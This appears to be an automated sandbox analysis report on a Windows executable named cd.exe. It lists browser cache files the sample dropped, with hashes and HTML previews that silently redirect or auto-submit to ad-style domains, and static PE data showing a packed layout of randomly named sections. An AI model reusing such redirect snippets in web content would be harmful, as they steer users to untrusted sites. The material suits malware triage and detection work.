                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1655
                                                                                                                                                                      Entropy (8bit):6.062272980018994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9TQ3GC2lAeIRjHpPQWhLB0yQkcz8uhTMeD3Uenvj:pQUOXNHpPQWJB0yQjQuhAm3Ueb
                                                                                                                                                                      MD5:5DB7C38AA6E80C00473D801F6610B35F
                                                                                                                                                                      SHA1:54DAB73B9A850665843529118E72AC0A5DAA55A1
                                                                                                                                                                      SHA-256:CC334F770DC2A3CD8B1AC2D64E035A71DDF8855C5B68F2DE884D11C7F8EC98E6
                                                                                                                                                                      SHA-512:E299B27F4E09EB08C9F800D54B27548738B9D74A33EFA8A460C488268EB6249CB1F8F932147411F541CF5A3B072BA503BE74A69E2A635AF671474352ED869585
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <html><head><meta name="referrer" content="no-referrer-when-downgrade"><title>Loading</title></head>.<body><script>location.href='https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrm
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):178637
                                                                                                                                                                      Entropy (8bit):5.493248742265343
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:w4zYNQN8X5XXuC2Bi03vb4yeMNzbXAkHM4yuSpAIksLKIp7zHNHwje3EMv5s+:DYNQmSuhMz4AIksPhxHwC3EM++
                                                                                                                                                                      MD5:7AA1AB3412E4EF309043E4EACCCC9EB4
                                                                                                                                                                      SHA1:A7BD66883FABD4B0CBEB2A04FB23FCEA06225351
                                                                                                                                                                      SHA-256:F41266FB78957B17A1D9335EF0AE32C1E153F297952E421CD3703F3FFC66F339
                                                                                                                                                                      SHA-512:C0D37ACF120BD28EE69019B549FB7F5EC2651013B31C38739D23D61C83C76390A9989BBEE6D7D1389463DC9B1420909FE4CF1E534340CCCE85EF7F330EEE17F3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: this.gbar_=this.gbar_||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var pe;._.qe=function(a,b){b?a.setAttribute("role",b):a.removeAttribute("role")};_.M=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;""===c||void 0==c?(pe||(pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};..}catch(e){_._DumpException(e)}.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var se,te,ue;_.re=function(a,b){var c=a.length-b.length;return 0<=c&&a.indexOf(b,c)==c};se=function(a){return"string"==typeof a.className?a.className:a.getAttribute&&a.getAttribute("class")||""};te=function(a){return a.classList?a.classList
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\1G7O03DV.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                      Entropy (8bit):4.811709820418917
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:qzxVkMRJWmNJax3XLxcKv8wF+B9hqecVAqV9qeSF0VqHV7bDRd7HTkIGII:kxVkMq/x3bxrX1eIVseSp1DRRQIGII
                                                                                                                                                                      MD5:7A7107EF5B0185F624703F0CE3161389
                                                                                                                                                                      SHA1:4E95838C06FBE825CD69FEAC3F28E91D6EA12D4F
                                                                                                                                                                      SHA-256:3750F0F41871B5F6A0669E0FAE857A2828AE2A187D8865D6E72F9929C4C00DFB
                                                                                                                                                                      SHA-512:D187740861254F65A115040FC5D0A3FFE9553917FC55EBD5989C6605726D749760144A4C208A89A4B655F2C48A7DAA6CFDDCA2F17C9A15F2DCF78BBA40D8EA16
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <html><head><meta http-equiv="refresh" content="5; url=http://ww9.menehleibe.com/"><title>Loading</title></head>.<body><form method="post" action="http://menehleibe.com/" target="_top" id="rf"><input type="hidden" name="ic" value="0"><input type="hidden" name="fb" value="true"/></form>.<script>document.getElementById("rf").submit()</script></body></html>
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\favicon[1].ico
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:MS Windows icon resource - 1 icon, 39x34, 32 bits/pixel
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5638
                                                                                                                                                                      Entropy (8bit):3.1461120884406477
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222A:fC
                                                                                                                                                                      MD5:DB884D3FED3F81D59E95E27707047C53
                                                                                                                                                                      SHA1:FD991A514B1284506BBBD229F4B067C3C7CC3CEB
                                                                                                                                                                      SHA-256:AAB68489204839B0F8E37065417C542695E914B959927D0E3AFD0D325E3787BC
                                                                                                                                                                      SHA-512:AD5FCAD5D60D89AFCE9ED1A62D05E88E71B664A53B552B428145B8CC2B8133BD8CC7439D615D26591CCC1A58EE5B29A16D4C215488ACF47ECFF0616A5F9B67ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\googlelogo_color_84x28dp[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 84 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1785
                                                                                                                                                                      Entropy (8bit):7.86894160499635
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YEOjo9umWXnrXeUpcvNugkko+loEDBKUrSUI3YDZVLMDLDzPhs++s4S9k/vaJvGb:YdBSUmdkkoPeVSUI3kLL0PW++smpU3St
                                                                                                                                                                      MD5:B434F84DE33C4672C8D883A73C67E27C
                                                                                                                                                                      SHA1:15AA5241692EE565028B7CAC1418F6979C061FE1
                                                                                                                                                                      SHA-256:E3EE16B33C7AFC3464C263A9604A39A2E5EE81ED4DD68F56AE7C82D814FAF6BE
                                                                                                                                                                      SHA-512:D449A4F7B1D812D6FE251C87F96AD79953391722A7635799C8B7171DCA63985BB64E8F0F991501513793FA9A1DB88F7B8DCE7D59174CFA23D66FD5EEF1D01813
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\LM1X3BMT.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):158522
                                                                                                                                                                      Entropy (8bit):5.912822586462801
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:vosOtA0vKWzhq7gnsUP1jBUN7n3eKCQ6h0/KpG790Q/+vRWca5pv0KdcQfYWi9MT:Q8I9o37w1Qcm0KdcV+t
                                                                                                                                                                      MD5:7B408FDFF3226BE3BA01BB6056273800
                                                                                                                                                                      SHA1:DA6B2223F142BA9006418476708C5BDBE9114796
                                                                                                                                                                      SHA-256:D777C3C3AFF47F876E09CF5A0BF321BC6AC660EB9716FD950CF5277BE70FEE8D
                                                                                                                                                                      SHA-512:6961A69F76D3603B629C7C620A92B34A7269189E2F2D8ACFF83675AB3B6F0A78D5ECB1120A62CAF11D460AAB4257047DFF9D73C6C0ADB8FC162D1A3DBF4996E2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><link href="/manifest?pwa=webhp" crossorigin="use-credentials" rel="manifest"><title>Google</title><script nonce="sBDQvviEJYE6GoG6F/T2Gw==">(function(){window.google={kEI:'rKtAYY2rHY25kwWZrp3YAw',kEXPI:'31',kBL:'myGb'};google.sn='webhp';google.kHL='en-GB';})();(function(){.var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}.function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\rs=AA2YrTt5urjnc1-as0vV15aU6T-f2ANE9g[1].css
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):235
                                                                                                                                                                      Entropy (8bit):5.054129687067898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:EZwTcqcA2n6gt9VvKcZWbnRVIM6RoeSjIUVY/:EZfqcA26gAcZWfp6SVY/
                                                                                                                                                                      MD5:2B1D2EF81983F949B10A03ECE9D6B80C
                                                                                                                                                                      SHA1:C171F9C15235F09A1E0397A5F47DF4D712E91550
                                                                                                                                                                      SHA-256:B3B95456B6C2CD4D41EAEB10DC4291970EBB430F6E538A4DAF99F8369A1F7101
                                                                                                                                                                      SHA-512:439F8992A36C3BBD3E65318B236CA58D80FFC5DC100B3B31BF4ACD238D9021DBF46DDAB3D32670C477FC155BB1991B75D807E392923B3801B2FBBC9D02EAF1B4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .gb_Qe{background:rgba(60,64,67,0.90);border-radius:4px;color:#ffffff;font:500 12px 'Roboto',arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000}sentinel{}
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\desktop_searchbox_sprites318_hr[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 40 x 124, 8-bit colormap, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):779
                                                                                                                                                                      Entropy (8bit):7.376883204451902
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36kAKAyMhGb5AHgK7+Wpf3sNQV34DVvN9sck:3vAKzVb5wuo3+1Jxk
                                                                                                                                                                      MD5:03E471800AFFD719388000AA2356DE1F
                                                                                                                                                                      SHA1:42E718342BD7F6EDF4899E161A77452DCBAC68F5
                                                                                                                                                                      SHA-256:BC23B3B207E8FA55B0C65A00F3FED491FA9EB5B1B39D159E7C4921BD331135EC
                                                                                                                                                                      SHA-512:BFA4329D35568F4F50AC2B05917AECB4AD3A4A69F8B7248E6D39CEA94F90C231B022C705ED1255F930271DB2BF5286F4B24BE6756A61E928B0D0723747D40081
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\googlelogo_color_272x92dp[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 544 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):13504
                                                                                                                                                                      Entropy (8bit):7.934568436975546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:gwSYjn2PH6WNa7cr7FliUuaJ78UOr0raQR:gOn2PaWNks7ziUuagJ0lR
                                                                                                                                                                      MD5:80FA4BCAB0351FDCCB69C66FB55DCD00
                                                                                                                                                                      SHA1:26F471F6EBE3B11557506F6AE96156E0A3852E5B
                                                                                                                                                                      SHA-256:262084257C2103702EF8A25705E3F8DBC1FA3823103AD7B954D54BDB77E6D89D
                                                                                                                                                                      SHA-512:B87A7554C5108400483EDAE585DAC672DEA6FE0DCD51CF5F73B4F9947649607F9C97B3B410FC0259BC2E0C60951DF2431323C1C7485A74291C23D999CFC32E17
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\index[1].htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):62
                                                                                                                                                                      Entropy (8bit):4.673133052883317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:nmNjJMzVJu+1v3pY1sK3uqn:GMRJVxYr3uqn
                                                                                                                                                                      MD5:2A54A8CB5733591ED39A9B22AD0D31EC
                                                                                                                                                                      SHA1:D3FD4F9D291464480866127810E89DBE410CC41B
                                                                                                                                                                      SHA-256:06FA9277A7F41DB91096AF3B9087516502F99EC5C62209D8F20426621EE1909F
                                                                                                                                                                      SHA-512:C673009AF39B5D992217E1109134281A3F48AB316E5A1F515A5A7509D8693818FA68328EFC0816BE5956BA79F87D0BB72899EC83F8E02827BF27170B5DE1D830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <meta http-equiv="refresh" content="0;URL= http://google.com">
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                      Entropy (8bit):4.484538240999641
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:oVXUtuCiPSdH8JOGXnEtuCiPSgun:o9UtugdHqEtugB
                                                                                                                                                                      MD5:FFC4B0966C043C7AC64A6D2462E63BF6
                                                                                                                                                                      SHA1:AADA1A11D642490C8D86635B12F8940F51AB64D4
                                                                                                                                                                      SHA-256:9F7112871FF782AC0CF220553CD17EB89965EE6F2BEAC59A692511A6D8718A2C
                                                                                                                                                                      SHA-512:523586F898A14A5731854B1BE50BA63EF7E506E81BE97AD8C5EB5B00A1F62FD1DCE6541959CEF49E7B5B7161787C2B1B31097CE552D323C7079F0F0B1257797F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: [2021/09/14 16:03:18.137] Latest deploy version: ..[2021/09/14 16:03:18.137] 11.211.2 ..
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12933
                                                                                                                                                                      Entropy (8bit):0.40677040396038333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9loSA9loSQ9lWSh1VI01iTF:kBqoIkaQbzo
                                                                                                                                                                      MD5:1DC22578617F1D3488CEB85FA0083C56
                                                                                                                                                                      SHA1:E0721DE9D8304D3BC7E550E148E247A426D0B681
                                                                                                                                                                      SHA-256:98B9D07C5D265759E63062020EAFB755B6FB9D5B22630810881C7DC532D94FFB
                                                                                                                                                                      SHA-512:67941D6A1BDFF429348115DB251445445C8BEB922759E2F28BC8E5DA8B9BF697B8F5039158C253867F1BBCCAA4FC8B2BCB7F7A517143CB6349CF5CD9F7DB1AAF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFFAD0E470126C2D77.TMP
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):51081
                                                                                                                                                                      Entropy (8bit):0.40980137997176297
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+6cGPcAQTTkOngHy85yg:kBqoxKAuqR+6cGPcAQ/kOngHy85yg
                                                                                                                                                                      MD5:ABA48F42A2D4459A35A1B6EF13FC8BFA
                                                                                                                                                                      SHA1:99CF9B826ADE51440E84043F1463A1CE4AA4EAA5
                                                                                                                                                                      SHA-256:92324F8734EE3288E2E31FE2331EF0C7899E4556B263C4AD2016AEB81C9EAE27
                                                                                                                                                                      SHA-512:B95C9CE22677F1C302B885F943A2DFFB738441D1F794E84E6355C5A44E9B748A3645344FE5950C5487D0959E10E6DF05B753A523D80614E52AA41A796F719E0A
                                                                                                                                                                      Malicious:false

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):5.362341936277573
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:cd.exe
                                                                                                                                                                      File size:3922432
                                                                                                                                                                      MD5:cd02e745a08dd29cb6fda1761b2f4b6e
                                                                                                                                                                      SHA1:1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
                                                                                                                                                                      SHA256:a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
                                                                                                                                                                      SHA512:f6c55fbb6ebf25f046f6d562d1c17d4503f8244f367f1dd64270ff8a9be56b6ed9c92dedd111359fa91d5ed8650773310f609c447baa0b1b4a9ee486143b2ca4
                                                                                                                                                                      SSDEEP:24576:BuuP1xP+9mrnv/6dh3Qh3OXuaq4gTeEu8Ct+M3VUXeN5DB:BtPHG6dZ4gTq8u+1Xq

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x4036f7
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                      Time Stamp:0x54941332 [Fri Dec 19 11:59:46 2014 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:ebc536e497c338b5abee5455de5bead2

Entrypoint Preview

Instruction
call 00007F44F8AE2DE7h
jmp 00007F44F8ADFF65h
push 00000014h
push 0042E750h
call 00007F44F8AE1498h
call 00007F44F8AE2FB8h
movzx esi, ax
push 00000002h
call 00007F44F8AE2D7Ah
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F44F8ADFF66h
xor ebx, ebx
jmp 00007F44F8ADFF95h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F44F8ADFF4Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F44F8ADFF3Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F44F8ADFF6Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F44F8AE2539h
test eax, eax
jne 00007F44F8ADFF6Ah
push 0000001Ch
call 00007F44F8AE0041h
pop ecx
call 00007F44F8AE2495h
test eax, eax
jne 00007F44F8ADFF6Ah
push 00000010h
call 00007F44F8AE0030h
pop ecx
call 00007F44F8AE2DF3h
and dword ptr [ebp-04h], 00000000h
call 00007F44F8AE2523h
test eax, eax
jns 00007F44F8ADFF6Ah
push 0000001Bh
call 00007F44F8AE0016h
pop ecx
call dword ptr [0042602Ch]
mov dword ptr [0043DFFCh], eax
call 00007F44F8AE2E0Eh
mov dword ptr [00434708h], eax
call 00007F44F8AE27B1h
test eax, eax
jns 00007F44F8ADFF6Ah

Rich Headers

Programming Language:
• [ C ] VS2013 build 21005
• [LNK] VS2013 UPD3 build 30723
• [C++] VS2013 build 21005
• [ASM] VS2013 build 21005
• [RES] VS2013 build 21005
• [IMP] VS2008 SP1 build 30729

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2ebb0          0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3e000          0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x26150          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2df00          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x26000          0x104         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type     Entropy        Characteristics
.text     0x1000           0x24b62       0x24c00   False     0.764774659864   data          6.93749374769  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata    0x26000          0x9182        0x9200    False     0.418049015411   data          4.70373356685  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0x30000          0xe000        0x4800    False     0.351616753472   data          3.54953091809  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc     0x3e000          0x1e0         0x200     False     0.53125          data          4.71767883295  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
aZAqrnJo  0x3f000          0x3819        0x3a00    False     0.371901939655   data          4.84589461101
BGOllIzc  0x43000          0x4896        0x4a00    False     0.430796030405   data          4.44387669298
yQtoRARz  0x48000          0xcbc0        0xcc00    False     0.348268995098   data          4.58448491924
dZLJZOuu  0x55000          0x60359       0x60400   False     0.332028713474   data          4.87800746939
sdDGHbsk  0xb6000          0x18385       0x18400   False     0.45299412049    data          5.29827826108
cQfsAIeK  0xcf000          0x3eeae       0x3f000   False     0.307458302331   data          5.32329417249
nJjdtQIB  0x10e000         0xff4f        0x10000   False     0.380676269531   data          4.75106212908
pcHOcQzM  0x11e000         0x607b        0x6200    False     0.496970663265   data          5.22222913281
wDcvvqlu  0x125000         0xa629        0xa800    False     0.457333519345   data          5.40009906885
orXBiygL  0x130000         0x28f16       0x29000   False     0.254954268293   data          4.87572841572
AiZKCfrK  0x159000         0x3c8b        0x3e00    False     0.276272681452   data          3.80209006598
myoGvTPf  0x15d000         0x27a         0x400     False     0.330078125      data          3.13663618281
AVTlzkED  0x15e000         0x4162        0x4200    False     0.383877840909   data          4.89078285751
bzLENpIH  0x163000         0x889a        0x8a00    False     0.345957880435   data          4.43979752948
XcYnViEt  0x16c000         0x59825       0x59a00   False     0.332216483612   SysEx File -  5.94377045532
mbKhPZXg  0x1c6000         0x944         0xa00     False     0.384375         data          4.46068376218
lUpFJlcq  0x1c7000         0x93          0x200     False     0.150390625      data          1.08603487889
yiDSdvAK  0x1c8000         0x29c49       0x29e00   False     0.292000932836   data          6.01702880808
tWLpgAgw  0x1f2000         0x1d3fb       0x1d400   False     0.329794337607   data          4.73500817041
bTGdVUjl  0x210000         0x1c142       0x1c200   False     0.322222222222   data          4.78096652478
ziIDaoXi  0x22d000         0xbd62        0xbe00    False     0.364823190789   data          4.66321532752
LzawvTwX  0x239000         0x21626       0x21800   False     0.1875           data          3.92488643682
LnIDzdzd  0x25b000         0x8000        0x8000    False     0.382080078125   data          4.73126113063
wkCXpCGo  0x263000         0x44a5        0x4600    False     0.351897321429   data          4.65104155262
nqpeKqho  0x268000         0x828a        0x8400    False     0.332682291667   data          4.39080198834
MRjgEOqy  0x271000         0x1cca        0x1e00    False     0.403776041667   data          5.16290821803
JcLmCXgA  0x273000         0xb8dc        0xba00    False     0.34627016129    data          4.63415459895
OtycdIdu  0x27f000         0x10649       0x10800   False     0.418235085227   data          5.25113561119
IbVOTdPC  0x290000         0x4b5         0x600     False     0.34375          data          3.25550625419
FgFHDyjf  0x291000         0x10775       0x10800   False     0.400153882576   data          4.92204812869
ybeqBvHg  0x2a2000         0xa663        0xa800    False     0.433430989583   data          5.16751770906
IbzUQYJs  0x2ad000         0x317f        0x3200    False     0.33484375       data          5.16903653942
AQBgSYnS  0x2b1000         0x3001        0x3200    False     0.395390625      data          5.13205626758
XxFUmGWX  0x2b5000         0x7fa3        0x8000    False     0.342498779297   data          4.64166784079
afVQQtfj  0x2bd000         0x1766        0x1800    False     0.4306640625     data          5.22679049555
nwvMTysA  0x2bf000         0x95de        0x9600    False     0.408567708333   data          4.91622055711
ZHPQhgLD  0x2c9000         0x31ea        0x3200    False     0.443125         data          5.40153365825
pxMMJkwk  0x2cd000         0xf4a0        0xf600    False     0.285410315041   data          4.15839164982
JXHCNYcJ  0x2dd000         0x645         0x800     False     0.384765625      data          3.87209019024
lYRopDTG  0x2de000         0x46ef        0x4800    False     0.217881944444   data          3.87911693157
bcYTpMaT  0x2e3000         0xb1b4        0xb200    False     0.446980337079   data          5.30459672358
nuBezWiu  0x2ef000         0xef16        0xf000    False     0.266731770833   data          4.54407396418
yPvpmSBg  0x2fe000         0x7d39        0x7e00    False     0.324776785714   data          4.31832937377
OoEfGgTM  0x306000         0x2239        0x2400    False     0.461805555556   data          4.81294100952
kYRGCWEC  0x309000         0x13560       0x13600   False     0.361365927419   data          4.61084789586
ssiFbfZW  0x31d000         0xfd20        0xfe00    False     0.397991510827   data          4.83645609944
KHKSQqok  0x32d000         0x2e91        0x3000    False     0.551106770833   data          6.15665163676
